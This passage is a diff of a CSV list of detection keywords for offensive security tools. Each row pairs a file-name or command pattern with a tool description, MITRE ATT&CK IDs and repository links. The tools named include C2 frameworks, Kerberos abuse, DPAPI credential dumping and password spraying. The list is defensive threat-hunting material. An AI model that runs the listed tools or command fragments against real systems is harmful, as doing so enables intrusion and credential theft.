 "*DoHC2*BeaconConnector*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
 "*DoHC2.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
@@ -9494,115 +9642,115 @@ "*DoHC2Runner.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.pdb*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*-domain_admins.txt*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*domain_analyzer.py*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_analyzer-master*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_hunter-v*.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*domainDumpConfig*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - 
T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*domainhunter*","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. 
The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" "*domainhunter.py*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*DomainPasswordSpray*","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" -"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - 
T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a 
bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for 
internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*DomainTrustDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation 
tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*DominicBreuker*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 
- TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*DonPAPI ""$DOMAIN""/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - 
